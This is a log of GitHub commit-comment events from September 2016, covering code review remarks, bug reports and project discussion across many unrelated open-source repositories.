{"id":"4506996832","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18876236,"position":null,"line":null,"path":null,"commit_id":"a7935cac6ebb6388ee7c7df3ac2ebdb8e849ed77","created_at":"2016-09-02T07:25:54Z","updated_at":"2016-09-02T07:25:54Z","body":"I didn't feel I was attacked, I just don't like working like this I guess. I haven't put in anything or done anything that I personally wanted to see (Other then Marvolo. He was / is an awesome boss) Every single commit has been something voiced from the community and then complained about from different parts of the community.  I get balance, I honestly do but there is never going to be any such thing. People with more time, better luck or bigger groups will always have an advantage.\r\n\r\nInstead of going into a long rant I'll simply stay I'm not stopping my work because I feel personally slighted. I'm stopping because I dislike drama and the job seems to come with nothing but. The entire reason I didn't want anything to do with being an admin seems to also apply to developing as well. Which is sad since I really did enjoy it"}},"created_at":"2016-09-02T07:25:54Z"}
{"id":"4506997068","type":"CommitCommentEvent","actor":{"login":"dowitsch"},"repo":{"name":"puzzle/cryptopus"},"payload":{"comment":{"id":18876239,"position":18,"line":32,"path":"app/helpers/admin/maintenance_tasks_helper.rb","commit_id":"0161c65dbe236a72e824566c59112caa643366b2","created_at":"2016-09-02T07:25:58Z","updated_at":"2016-09-02T07:25:58Z","body":"Nid dases gross stört aber wieso machsch für ds extra ä variable?"}},"created_at":"2016-09-02T07:25:58Z"}
{"id":"4506998143","type":"CommitCommentEvent","actor":{"login":"joeytwiddle"},"repo":{"name":"coolaj86/nodejs-ssl-trusted-peer-example"},"payload":{"comment":{"id":18876242,"position":13,"line":13,"path":"make-root-ca-and-certificates.sh","commit_id":"1b5ba16ad69b1ffa3d296b1afc1865d23e5b24a1","created_at":"2016-09-02T07:26:17Z","updated_at":"2016-09-02T07:26:17Z","body":"I don't think it is true that this is private.\r\n\r\nYou later copy the generated file `my-private-root-ca.crt.pem` to the `client/` folder.\r\n\r\n(That is good, because clients can use this file to trust any server keys generated from this CA's private key.)\r\n\r\nBut if clients have it, then it's not public.  And `openssl verify my-private-root-ca.crt.pem` clearly shows the \"bogus\" information that was initially entered."}},"created_at":"2016-09-02T07:26:17Z"}
{"id":"4507005422","type":"CommitCommentEvent","actor":{"login":"isfull"},"repo":{"name":"redis/hiredis"},"payload":{"comment":{"id":18876256,"position":5,"line":132,"path":"hiredis.h","commit_id":"51ab89d8998e3f6844f72e020e53200e80fe52f7","created_at":"2016-09-02T07:28:15Z","updated_at":"2016-09-02T07:28:15Z","body":"I didnt know why here exist hardcode. Now I know, and Im gonna get a new version."}},"created_at":"2016-09-02T07:28:15Z"}
{"id":"4507006387","type":"CommitCommentEvent","actor":{"login":"friizu"},"repo":{"name":"Magestore/Bannerslider-Magento2"},"payload":{"comment":{"id":18876261,"position":null,"line":null,"path":null,"commit_id":"1c90970bf0c56845091bfc44c1faaea210b87432","created_at":"2016-09-02T07:28:32Z","updated_at":"2016-09-02T07:28:32Z","body":"Setup\\UpdateSchema.php is missing to add new column on module update."}},"created_at":"2016-09-02T07:28:32Z"}
{"id":"4507013575","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"Armen63/AddressBook"},"payload":{"comment":{"id":18876272,"position":39,"line":39,"path":"src/Controller.java","commit_id":"0fab61194e55f1bd98c09ae834f3ba24f955fdf8","created_at":"2016-09-02T07:30:30Z","updated_at":"2016-09-02T07:30:30Z","body":"the \"text.txt\" value you should read from properties file."}},"created_at":"2016-09-02T07:30:30Z"}
{"id":"4507014751","type":"CommitCommentEvent","actor":{"login":"NikitaMayorov"},"repo":{"name":"NikitaMayorovinc/homework"},"payload":{"comment":{"id":18876274,"position":null,"line":null,"path":null,"commit_id":"fd860cb55614995b8b39fc403f5af8dacd59c5b0","created_at":"2016-09-02T07:30:51Z","updated_at":"2016-09-02T07:30:51Z","body":"change"}},"created_at":"2016-09-02T07:30:51Z"}
{"id":"4507018986","type":"CommitCommentEvent","actor":{"login":"lunaryorn"},"repo":{"name":"proofit404/service-factory"},"payload":{"comment":{"id":18876286,"position":null,"line":null,"path":null,"commit_id":"e7086bdeb7441dabbbd8ca89a61f388e9c75899b","created_at":"2016-09-02T07:32:02Z","updated_at":"2016-09-02T07:32:02Z","body":":+1: :blush:\r\n"}},"created_at":"2016-09-02T07:32:02Z"}
{"id":"4507019077","type":"CommitCommentEvent","actor":{"login":"zongwave"},"repo":{"name":"zongwave/libxcam"},"payload":{"comment":{"id":18876287,"position":null,"line":null,"path":null,"commit_id":"fe775ae61d10f6631b725a5392f84e8bc1e7cef8","created_at":"2016-09-02T07:32:04Z","updated_at":"2016-09-02T07:32:04Z","body":"optimize read reference image data from shared local memory\r\nread one uchar8 instead of read uchar4 twice"}},"created_at":"2016-09-02T07:32:04Z"}
{"id":"4507019520","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876288,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:32:12Z","updated_at":"2016-09-02T07:32:12Z","body":"I just used\r\n```\r\nqt_platform_theme_new = HAVE_QT57 ? \"qt5ct\" : \"qgnomeplatform\";\r\n\r\n        if (NULL == g_getenv (\"QT_QPA_PLATFORMTHEME\")) {\r\n            csm_util_setenv (\"QT_QPA_PLATFORMTHEME\", qt_platform_theme_new);\r\n        }\r\n```\r\nnothing more. QT_STYLE_OVERRIDE isn't set and it won't get set like that."}},"created_at":"2016-09-02T07:32:12Z"}
{"id":"4507025782","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"AlexisTM/Indoor_Position_lasers"},"payload":{"comment":{"id":18876297,"position":null,"line":null,"path":null,"commit_id":"5a654492d9ed4f3c446e3a4e7029cab70af3cda6","created_at":"2016-09-02T07:33:57Z","updated_at":"2016-09-02T07:33:57Z","body":"Hey @AlexisTM ,I admire your work....my project requires me to interface arduino Uno with pixhawk but have no idea how to do that....can you please explain me by a simple code how to collect serial data coming out of arduino by pixhawk and send to ground station.....lets say arduino is giving out data like 1,2.5 on serial port and the same data needs to be collected by pixhawk to send to ground station...kindly help when you get time"}},"created_at":"2016-09-02T07:33:57Z"}
{"id":"4507027075","type":"CommitCommentEvent","actor":{"login":"takashi310"},"repo":{"name":"takashi310/VVD_Viewer"},"payload":{"comment":{"id":18876303,"position":null,"line":null,"path":null,"commit_id":"d2bff458b8c469229aa85f716948018a5601755d","created_at":"2016-09-02T07:34:21Z","updated_at":"2016-09-02T07:34:21Z","body":"This version can not find an AMD FirePro GPU on a MacBook Pro."}},"created_at":"2016-09-02T07:34:21Z"}
{"id":"4507027862","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"Armen63/AddressBook"},"payload":{"comment":{"id":18876305,"position":38,"line":38,"path":"src/Controller.java","commit_id":"0fab61194e55f1bd98c09ae834f3ba24f955fdf8","created_at":"2016-09-02T07:34:34Z","updated_at":"2016-09-02T07:34:34Z","body":"Your method name should start with lower case. \r\nIf your method is validate then this method should only do validation. This method should not do other method calls like signUp(), signIn(), etc. \r\nActually this method name should be executor instead of validation. You can write other method validation which will only check if this command is valid or not and call that validation method inside executor method."}},"created_at":"2016-09-02T07:34:34Z"}
{"id":"4507031148","type":"CommitCommentEvent","actor":{"login":"cahirwpz"},"repo":{"name":"cahirwpz/mimiker"},"payload":{"comment":{"id":18876310,"position":4,"line":168,"path":"mips/pmap.c","commit_id":"c7547819fb5f649a5ee1e4c8b9e59e773e7cd076","created_at":"2016-09-02T07:35:29Z","updated_at":"2016-09-02T07:35:29Z","body":"Why?"}},"created_at":"2016-09-02T07:35:29Z"}
{"id":"4507033717","type":"CommitCommentEvent","actor":{"login":"torkiljohnsen"},"repo":{"name":"vinkla/laravel-translator"},"payload":{"comment":{"id":18876317,"position":null,"line":null,"path":null,"commit_id":"7c077968d7516196aadbc46c9f1c034794105849","created_at":"2016-09-02T07:36:13Z","updated_at":"2016-09-02T07:36:13Z","body":"You forgot to pass on `$attributes` I think.\r\n\r\nSuggestion:\r\n\r\n```php\r\npublic function isDirty($attributes = null)\r\n{\r\n    return parent::isDirty($attributes) ?: count($this->cache) > 0;\r\n}\r\n```"}},"created_at":"2016-09-02T07:36:13Z"}
{"id":"4507033898","type":"CommitCommentEvent","actor":{"login":"vvo"},"repo":{"name":"algolia/autocomplete.js"},"payload":{"comment":{"id":18876318,"position":null,"line":null,"path":null,"commit_id":"4b50b7f308b3404f39466cb7bbd94c87c15ebfb8","created_at":"2016-09-02T07:36:15Z","updated_at":"2016-09-02T07:36:15Z","body":"nice"}},"created_at":"2016-09-02T07:36:15Z"}
{"id":"4507036774","type":"CommitCommentEvent","actor":{"login":"vinkla"},"repo":{"name":"vinkla/laravel-translator"},"payload":{"comment":{"id":18876323,"position":null,"line":null,"path":null,"commit_id":"7c077968d7516196aadbc46c9f1c034794105849","created_at":"2016-09-02T07:37:04Z","updated_at":"2016-09-02T07:37:04Z","body":"Whoops! Maybe you could create a pull request?"}},"created_at":"2016-09-02T07:37:04Z"}
{"id":"4507037569","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18876325,"position":null,"line":null,"path":null,"commit_id":"7eb91c6290cf6f6b0d84c8e8a55d92d6fc650549","created_at":"2016-09-02T07:37:16Z","updated_at":"2016-09-02T07:37:16Z","body":"@atamariya I don't see that that disagrees with what I said, unless I'm misunderstanding.\r\nIt always degrades the quality but you can prevent some of the loss by increasing bitrate."}},"created_at":"2016-09-02T07:37:16Z"}
{"id":"4507038242","type":"CommitCommentEvent","actor":{"login":"torkiljohnsen"},"repo":{"name":"vinkla/laravel-translator"},"payload":{"comment":{"id":18876327,"position":null,"line":null,"path":null,"commit_id":"7c077968d7516196aadbc46c9f1c034794105849","created_at":"2016-09-02T07:37:28Z","updated_at":"2016-09-02T07:37:28Z","body":"Ok"}},"created_at":"2016-09-02T07:37:28Z"}
{"id":"4507038284","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Armen63/AddressBook"},"payload":{"comment":{"id":18876328,"position":46,"line":46,"path":"src/Controller.java","commit_id":"0fab61194e55f1bd98c09ae834f3ba24f955fdf8","created_at":"2016-09-02T07:37:29Z","updated_at":"2016-09-02T07:37:29Z","body":"Your messages like \"\"Please write down one of this commands 'Sign In' or 'Sign Up'.\"\" you should read from properties files"}},"created_at":"2016-09-02T07:37:29Z"}
{"id":"4507042248","type":"CommitCommentEvent","actor":{"login":"devenbansod"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":18876336,"position":null,"line":null,"path":null,"commit_id":"9a943d464d9f1b56ef4277a18c045941359b3b26","created_at":"2016-09-02T07:38:33Z","updated_at":"2016-09-02T07:38:33Z","body":"@nijel Any idea about this failure [1] ? This commit seems to have caused it I guess.\r\n\r\n[1] : https://travis-ci.org/phpmyadmin/phpmyadmin/jobs/157018707"}},"created_at":"2016-09-02T07:38:33Z"}
{"id":"4507043542","type":"CommitCommentEvent","actor":{"login":"dowitsch"},"repo":{"name":"puzzle/cryptopus"},"payload":{"comment":{"id":18876340,"position":11,"line":11,"path":"app/models/maintenance_tasks/new_root_password.rb","commit_id":"0161c65dbe236a72e824566c59112caa643366b2","created_at":"2016-09-02T07:38:54Z","updated_at":"2016-09-02T07:38:54Z","body":"Chame ds no übersetze?"}},"created_at":"2016-09-02T07:38:54Z"}
{"id":"4507043992","type":"CommitCommentEvent","actor":{"login":"PabloRodenas"},"repo":{"name":"PabloRodenas/b2note"},"payload":{"comment":{"id":18876344,"position":null,"line":null,"path":null,"commit_id":"0d0477b2630516aa785dc08bfa0d0fecebe78755","created_at":"2016-09-02T07:39:01Z","updated_at":"2016-09-02T07:39:01Z","body":"Issues detected:\r\n - The API retrieve_annotations function is still not returning the jsonld of the annotations.\r\n- When displaying all annotations in a browser, we get the error: \"XML Parsing Error: not well-formed\" due to the fact that there is a tag name: <@context>\r\n- Exporting the annotations from interface_main there is still fields \"context\" without the \"@\" but in the models all those fields are renamed to \"@context\" as a column name."}},"created_at":"2016-09-02T07:39:01Z"}
{"id":"4507044384","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Armen63/AddressBook"},"payload":{"comment":{"id":18876347,"position":100,"line":100,"path":"src/Controller.java","commit_id":"0fab61194e55f1bd98c09ae834f3ba24f955fdf8","created_at":"2016-09-02T07:39:07Z","updated_at":"2016-09-02T07:39:07Z","body":"Here you should have repository method call (e.g. userRepo.addUser(user)) which will add your user to the database(in your case to the file)"}},"created_at":"2016-09-02T07:39:07Z"}
{"id":"4507044439","type":"CommitCommentEvent","actor":{"login":"dowitsch"},"repo":{"name":"puzzle/cryptopus"},"payload":{"comment":{"id":18876348,"position":5,"line":10,"path":"app/models/maintenance_tasks/root_as_admin.rb","commit_id":"0161c65dbe236a72e824566c59112caa643366b2","created_at":"2016-09-02T07:39:08Z","updated_at":"2016-09-02T07:39:08Z","body":"chame ds o übersetze?"}},"created_at":"2016-09-02T07:39:08Z"}
{"id":"4507045340","type":"CommitCommentEvent","actor":{"login":"ruhri"},"repo":{"name":"mapserver/mapserver"},"payload":{"comment":{"id":18876350,"position":null,"line":null,"path":null,"commit_id":"b007fdb06871dc95e5b2577c0bd83d16b31459bd","created_at":"2016-09-02T07:39:21Z","updated_at":"2016-09-02T07:39:21Z","body":"I'm sure, the table is spatial.\r\n\r\n![table](https://cloud.githubusercontent.com/assets/5791751/18195367/494afd70-70eb-11e6-9d33-92f821b31ab2.jpg)\r\n\r\nChanging my filters (on the same table-columns) so that I get Features, everything is OK.\r\n\r\nRelevant part of mapfile:\r\nDATA \"SELECT * FROM poi_gp_pois_allepoisn_tb WHERE coll_idpfad LIKE '%poi_unterkuenfte_coll_idpfad%' AND bedeutung_id <= '%symbol_scaledenom%'\"\r\n\r\nVALIDATION\r\n\t\"poi_unterkuenfte_coll_idpfad\" '^609-[0-9\\-]+$'\r\n\t\"default_poi_unterkuenfte_coll_idpfad\" '609%'\r\nEND\r\n\r\nSCALETOKEN\r\n\tNAME \"%symbol_scaledenom%\"\r\n\tVALUES\r\n\t\t\"0\"\t\t'3'\r\n\t\t\"21000\"\t'2'\r\n\t\t\"81000\"\t'1'\r\n\tEND\r\nEND\r\n\r\nother layers just have different LIKE filters, e.g. \"default_poi_natur_coll_idpfad\" '404%' -> works"}},"created_at":"2016-09-02T07:39:21Z"}
{"id":"4507049776","type":"CommitCommentEvent","actor":{"login":"ferventcoder"},"repo":{"name":"chocolatey/choco"},"payload":{"comment":{"id":18876364,"position":null,"line":null,"path":null,"commit_id":"2d39d97f01435d655fcc3675ab893bf71d60e6cb","created_at":"2016-09-02T07:40:34Z","updated_at":"2016-09-02T07:40:34Z","body":"Some of this code was originally at https://github.com/chocolatey/choco/pull/459"}},"created_at":"2016-09-02T07:40:34Z"}
{"id":"4507052540","type":"CommitCommentEvent","actor":{"login":"lrineau"},"repo":{"name":"lrineau/cgal"},"payload":{"comment":{"id":18876370,"position":null,"line":null,"path":null,"commit_id":"067cba50e66647a3108f563b94c26fcd807151a2","created_at":"2016-09-02T07:41:19Z","updated_at":"2016-09-02T07:41:19Z","body":"@janetournois This is the second bug! The mesh domain oracle was buggy, in our special case when the `Null_subdomain_index` functor is non-trivial.\r\n"}},"created_at":"2016-09-02T07:41:19Z"}
{"id":"4507052731","type":"CommitCommentEvent","actor":{"login":"glasswm"},"repo":{"name":"codexss/shadowsocks-manager"},"payload":{"comment":{"id":18876371,"position":null,"line":null,"path":null,"commit_id":"54aed724f5576de360c35ca5ccbf1040b72c6df0","created_at":"2016-09-02T07:41:23Z","updated_at":"2016-09-02T07:41:23Z","body":"测试了下，按这个修改后，续费码仍然加不上时间。\r\n@codexss 你改后测试成功吗？"}},"created_at":"2016-09-02T07:41:23Z"}
{"id":"4507056184","type":"CommitCommentEvent","actor":{"login":"ianfab"},"repo":{"name":"ddugovic/Stockfish"},"payload":{"comment":{"id":18876378,"position":null,"line":null,"path":null,"commit_id":"37a29176aed6a294f023df32a4d94bec58654cf7","created_at":"2016-09-02T07:42:16Z","updated_at":"2016-09-02T07:42:16Z","body":"Variants regression test results for the merged upstream changes (37a2917 vs. 4f2b27e):\r\n\r\nKing of the Hill:\r\nELO: -12.86 +-19.9 (95%) LOS: 10.2%\r\nTotal: 1000 W: 407 L: 444 D: 149\r\n\r\nThree-check:\r\nELO: 45.78 +-21.3 (95%) LOS: 100.0%\r\nTotal: 1000 W: 547 L: 416 D: 37\r\n\r\nAtomic:\r\nELO: 76.98 +-19.3 (95%) LOS: 100.0%\r\nTotal: 1000 W: 496 L: 278 D: 226\r\n\r\nHorde:\r\nELO: -43.30 +-21.6 (95%) LOS: 0.0%\r\nTotal: 1000 W: 433 L: 557 D: 10\r\n\r\nRacing Kings:\r\nELO: 17.73 +-18.2 (95%) LOS: 97.2%\r\nTotal: 1000 W: 381 L: 330 D: 289\r\n\r\nAntichess:\r\nELO: -12.17 +-19.1 (95%) LOS: 10.5%\r\nTotal: 1000 W: 374 L: 409 D: 217"}},"created_at":"2016-09-02T07:42:16Z"}
{"id":"4507061467","type":"CommitCommentEvent","actor":{"login":"pmfx"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18876394,"position":null,"line":null,"path":null,"commit_id":"1ee53dfb9ddf30934893d1d122ee966afced683c","created_at":"2016-09-02T07:43:40Z","updated_at":"2016-09-02T07:43:40Z","body":"I was a little confused when first tried this new feature only clicking on top button, but found it in context menu and all works fine. Maybe some info about sorting children elements would be good when clicking on top button."}},"created_at":"2016-09-02T07:43:40Z"}
{"id":"4507063994","type":"CommitCommentEvent","actor":{"login":"compumatrix"},"repo":{"name":"bitshares/bitshares-2"},"payload":{"comment":{"id":18876405,"position":null,"line":null,"path":null,"commit_id":"dfb9043df54a9f51983ed04014cd9ddc2a216323","created_at":"2016-09-02T07:44:21Z","updated_at":"2016-09-02T07:44:21Z","body":"Hi @svk31 !! Just wondering why the html distribution's GUI doesn't look like the one on Openledger. The chart looks better on Openledger than all the other web wallets hosted."}},"created_at":"2016-09-02T07:44:21Z"}
{"id":"4507068876","type":"CommitCommentEvent","actor":{"login":"scerdalian"},"repo":{"name":"jcadduono/idleKernel-note3"},"payload":{"comment":{"id":18876429,"position":null,"line":null,"path":null,"commit_id":"376481267592ae9668f4402c75a729fc5503c09f","created_at":"2016-09-02T07:45:40Z","updated_at":"2016-09-02T07:45:40Z","body":"thanks ,but i can not log on freenode irc coz the china firewall. i have tried that twrp-3.0.2-1-kltechn.img.tar,it does not work.where can i find the proper dtb and could i chuck it in kltechn by myself?"}},"created_at":"2016-09-02T07:45:40Z"}
{"id":"4507071038","type":"CommitCommentEvent","actor":{"login":"compumatrix"},"repo":{"name":"bitshares/bitshares-2"},"payload":{"comment":{"id":18876435,"position":null,"line":null,"path":null,"commit_id":"dfb9043df54a9f51983ed04014cd9ddc2a216323","created_at":"2016-09-02T07:46:10Z","updated_at":"2016-09-02T07:46:10Z","body":"I'm referring to this chart:\r\n\r\n![capture](https://cloud.githubusercontent.com/assets/2491389/18196483/44ace416-7124-11e6-8f35-a5d8a788c351.PNG)\r\n"}},"created_at":"2016-09-02T07:46:10Z"}
{"id":"4507073944","type":"CommitCommentEvent","actor":{"login":"ChALkeR"},"repo":{"name":"maxogden/concat-stream"},"payload":{"comment":{"id":18876440,"position":null,"line":null,"path":null,"commit_id":"3e285ba5e5b10b7c98552217f5c1023829efe69e","created_at":"2016-09-02T07:46:53Z","updated_at":"2016-09-02T07:46:53Z","body":"@maxogden Sorry, I don't understand what you mean by that picture, but I assume that you think that I am talking about the speed of fixing this issue. I am not.\r\n\r\nWhat I am talking about is the fact that I sent a _private_ report, then, as a result of that, the issue has been made _public_, and kept disclosed but unfixed for 13 days.\r\n\r\nCorrect me if I am wrong, please."}},"created_at":"2016-09-02T07:46:53Z"}
{"id":"4507076884","type":"CommitCommentEvent","actor":{"login":"AlexisTM"},"repo":{"name":"AlexisTM/Indoor_Position_lasers"},"payload":{"comment":{"id":18876445,"position":null,"line":null,"path":null,"commit_id":"5a654492d9ed4f3c446e3a4e7029cab70af3cda6","created_at":"2016-09-02T07:47:30Z","updated_at":"2016-09-02T07:47:30Z","body":"For ease, I answered in #1"}},"created_at":"2016-09-02T07:47:30Z"}
{"id":"4507077969","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876450,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:47:47Z","updated_at":"2016-09-02T07:47:47Z","body":"Please check **v.1.4** and report back. It should now set **QT_STYLE_OVERRIDE** only when **QT_QPA_PLATFORMTHEME** is not **qt5ct**."}},"created_at":"2016-09-02T07:47:47Z"}
{"id":"4507079257","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"bezoerb/grunt-critical"},"payload":{"comment":{"id":18876452,"position":null,"line":null,"path":null,"commit_id":"b05a2174a510fb720a12cf4f0de3f4302052e184","created_at":"2016-09-02T07:48:09Z","updated_at":"2016-09-02T07:48:09Z","body":"@bezoerb: please check the state of master branch and release a new version after a major or minor version bump."}},"created_at":"2016-09-02T07:48:09Z"}
{"id":"4507083437","type":"CommitCommentEvent","actor":{"login":"akegalj"},"repo":{"name":"input-output-hk/rscoin-core"},"payload":{"comment":{"id":18876466,"position":null,"line":null,"path":null,"commit_id":"f0ec5a3d806061c1b4fdd00ccddbe99177418be5","created_at":"2016-09-02T07:49:13Z","updated_at":"2016-09-02T07:49:13Z","body":"I agree. Will put it back."}},"created_at":"2016-09-02T07:49:13Z"}
{"id":"4507093027","type":"CommitCommentEvent","actor":{"login":"jhernand"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18876493,"position":63,"line":63,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T07:51:43Z","updated_at":"2016-09-02T07:51:43Z","body":"This documentation looks incorrect, it talks about the virtual NIC, but the name of the parameter is `provisioned_size`.\r\n\r\nIs there any reason to name this `provisioned_size`? It seems a bit counter intuitive to me. As we don't provide any other mechanism to set the size of the disk I'd call it just `size`."}},"created_at":"2016-09-02T07:51:43Z"}
{"id":"4507093035","type":"CommitCommentEvent","actor":{"login":"darkbatka"},"repo":{"name":"darkbatka/dark"},"payload":{"comment":{"id":18876494,"position":22,"line":22,"path":"trail","commit_id":"4313eb8cade072f0927f0b22d0784d14c7422612","created_at":"2016-09-02T07:51:43Z","updated_at":"2016-09-02T07:51:43Z","body":"wow its trail?"}},"created_at":"2016-09-02T07:51:43Z"}
{"id":"4507095224","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"DardoTheMaster/Framework"},"payload":{"comment":{"id":18876501,"position":11,"line":882,"path":"Altis_Life.Altis/stringtable.xml","commit_id":"2498c4435de1b250b1b7087ca7e375b7c36e43ff","created_at":"2016-09-02T07:52:18Z","updated_at":"2016-09-02T07:52:18Z","body":"Tabs - not 4 spaces - are used here and on lines 883-884, 892, and 897. "}},"created_at":"2016-09-02T07:52:18Z"}
{"id":"4507095378","type":"CommitCommentEvent","actor":{"login":"jhernand"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18876503,"position":75,"line":75,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T07:52:20Z","updated_at":"2016-09-02T07:52:20Z","body":"Is this the name or the id of the storage domain?"}},"created_at":"2016-09-02T07:52:20Z"}
{"id":"4507096815","type":"CommitCommentEvent","actor":{"login":"jhernand"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18876507,"position":78,"line":78,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T07:52:41Z","updated_at":"2016-09-02T07:52:41Z","body":"Name or id?"}},"created_at":"2016-09-02T07:52:41Z"}
{"id":"4507099625","type":"CommitCommentEvent","actor":{"login":"jhernand"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18876518,"position":87,"line":87,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T07:53:25Z","updated_at":"2016-09-02T07:53:25Z","body":"This has always been confusing to me. Who needs a disk that isn't active? Do we really need this parameter?"}},"created_at":"2016-09-02T07:53:25Z"}
{"id":"4507102453","type":"CommitCommentEvent","actor":{"login":"ddugovic"},"repo":{"name":"ddugovic/Stockfish"},"payload":{"comment":{"id":18876527,"position":null,"line":null,"path":null,"commit_id":"37a29176aed6a294f023df32a4d94bec58654cf7","created_at":"2016-09-02T07:54:07Z","updated_at":"2016-09-02T07:54:07Z","body":"I'm very confused: I thought I had already merged this change from upstream along with about 10 other changes?"}},"created_at":"2016-09-02T07:54:07Z"}
{"id":"4507105037","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-module-htmlformentry"},"payload":{"comment":{"id":18876535,"position":null,"line":null,"path":null,"commit_id":"25149f5094de966006c3a31ec7712b8fadb66bfe","created_at":"2016-09-02T07:54:42Z","updated_at":"2016-09-02T07:54:42Z","body":"@mogoodrich i reverted this at: https://github.com/openmrs/openmrs-module-htmlformentry/commit/a4a4d16783d1f38a8b2b10f58f9f28ea154cd834\r\nThe reasoning behind reverting this is that, since an htmlform allows users to include JavaScript functionality, there is no point in trying to prevent one from executing JavaScript via a velocity expression. So i do not see a way we can avoid XSS attacks embedded in an htmlform, without disabling JavaScript functionality. Do you agree? :)"}},"created_at":"2016-09-02T07:54:42Z"}
{"id":"4507105456","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"DardoTheMaster/Framework"},"payload":{"comment":{"id":18876539,"position":null,"line":null,"path":null,"commit_id":"2498c4435de1b250b1b7087ca7e375b7c36e43ff","created_at":"2016-09-02T07:54:49Z","updated_at":"2016-09-02T07:54:49Z","body":"Some - but not all - of the [`==`](https://community.bistudio.com/wiki/a%20==%20b) could be changed to [`isEqualTo`](https://community.bistudio.com/wiki/isEqualTo) without error. "}},"created_at":"2016-09-02T07:54:49Z"}
{"id":"4507108913","type":"CommitCommentEvent","actor":{"login":"machacekondra"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18876548,"position":63,"line":63,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T07:55:42Z","updated_at":"2016-09-02T07:55:42Z","body":"Oh, I see, ok, thanks."}},"created_at":"2016-09-02T07:55:42Z"}
{"id":"4507109920","type":"CommitCommentEvent","actor":{"login":"yoowind"},"repo":{"name":"yoowind/hellowind"},"payload":{"comment":{"id":18876553,"position":null,"line":null,"path":null,"commit_id":"1cc75a599847cc288c97e6927923d40e15bb5ca2","created_at":"2016-09-02T07:55:58Z","updated_at":"2016-09-02T07:55:58Z","body":"好名字"}},"created_at":"2016-09-02T07:55:58Z"}
{"id":"4507110731","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"DardoTheMaster/Framework"},"payload":{"comment":{"id":18876555,"position":37,"line":56,"path":"Altis_Life.Altis/dialog/function/fn_unimpound.sqf","commit_id":"2498c4435de1b250b1b7087ca7e375b7c36e43ff","created_at":"2016-09-02T07:56:12Z","updated_at":"2016-09-02T07:56:12Z","body":"Can this text and the text below be localised? \r\n"}},"created_at":"2016-09-02T07:56:12Z"}
{"id":"4507112220","type":"CommitCommentEvent","actor":{"login":"jhernand"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18876558,"position":139,"line":139,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T07:56:34Z","updated_at":"2016-09-02T07:56:34Z","body":"Please don't use this `jhernand` URL, as it may go away without notice. If possible explain that the description of the attributes is available directly from the engine: https://ovirt.example.com/ovirt-engine/api/mode#types/disk. That we are committed to keep."}},"created_at":"2016-09-02T07:56:34Z"}
{"id":"4507113047","type":"CommitCommentEvent","actor":{"login":"jhernand"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18876560,"position":143,"line":143,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T07:56:46Z","updated_at":"2016-09-02T07:56:46Z","body":"Same, no `jhernand`, please."}},"created_at":"2016-09-02T07:56:46Z"}
{"id":"4507114130","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18876562,"position":null,"line":null,"path":null,"commit_id":"7e7f07a41d5460ccba3cd1ee0be5cba43eb5fc17","created_at":"2016-09-02T07:57:00Z","updated_at":"2016-09-02T07:57:00Z","body":"tbh i initially wanted it to be on the right, but now it looks weird to me, probably because i'm used to the left position, so that's fine :)"}},"created_at":"2016-09-02T07:57:00Z"}
